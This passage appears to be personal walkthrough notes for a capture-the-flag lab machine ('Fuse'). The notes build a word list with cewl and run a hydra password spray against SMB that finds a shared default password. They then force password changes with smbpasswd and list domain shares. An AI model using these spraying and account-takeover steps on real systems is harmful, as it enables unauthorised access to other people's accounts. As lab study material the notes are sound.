5 spray passwd

# smb doesn't connect
# ldap needs auth

# time to cewl
$ cewl http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers -w pass.txt

ssh - nothing.
$ hydra -L users -P pass.txt smb://10.10.10.193
[DATA] attacking smb://10.10.10.193:445/
[445][smb] Host: 10.10.10.193 Account: tlavel Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: tlavel   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bnielson Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bnielson   password: Fabricorp01
[445][smb] Host: 10.10.10.193 Account: bhult Valid password, password expired and must be changed on next logon
[445][smb] host: 10.10.10.193   login: bhult   password: Fabricorp01


# trying smbclient
$ smbclient -L 10.10.10.193 -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bnielson
Enter WORKGROUP\bnielson's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

$ smbclient -L 10.10.10.193 -U bhult
Enter WORKGROUP\bhult's password:
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

# we need to change password using smbpasswd in kali
$ smbpasswd -r 10.10.10.193 -U tlavel
Old SMB password:
New SMB password: kashz
Retype new SMB password: kashz
machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria.

# there's a password policy that we need to follow
# changing to Fabricorp02

$ smbpasswd -r 10.10.10.193 -U bnielson
Old SMB password: Fabricorp01
New SMB password: Fabricorp05
Retype new SMB password: Fabricorp05
Password changed for user tlavel

$ smbclient -U tlavel -L //10.10.10.193
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE

# trying other users
# fails for bhult also
| bnielson works

$ smbclient -U bnielson%Fabricorp05 -L //10.10.10.193

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
		
# after every 1-2 min, password is reset and need to change to a different one as using same gives error
| machine 10.10.10.193 rejected the password change: Error was : When trying to update a password, this status indicates that some password update rule has been violated. For example, the password might not meet length criteria..

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/HP-MFT01
Try "help" to get a list of possible commands.
smb: \> dir
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

$ smbclient -U bnielson%Fabricorp05 //10.10.10.193/SYSVOL
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Fri May 29 16:29:09 2020
  ..                                  D        0  Fri May 29 16:29:09 2020
  fabricorp.local                    Dr        0  Fri May 29 16:29:09 2020
  
smb: \fabricorp.local\> dir
  .                                   D        0  Fri May 29 16:35:39 2020
  ..                                  D        0  Fri May 29 16:35:39 2020
  DfsrPrivate                      DHSr        0  Fri May 29 16:35:39 2020
  Policies                            D        0  Fri May 29 16:29:19 2020
  scripts                             D        0  Fri May 29 16:29:09 2020

# cannot view DfsrPrivate
# scripts is empty
# Policies contain policy relatd information

# nothing in smb

Last updated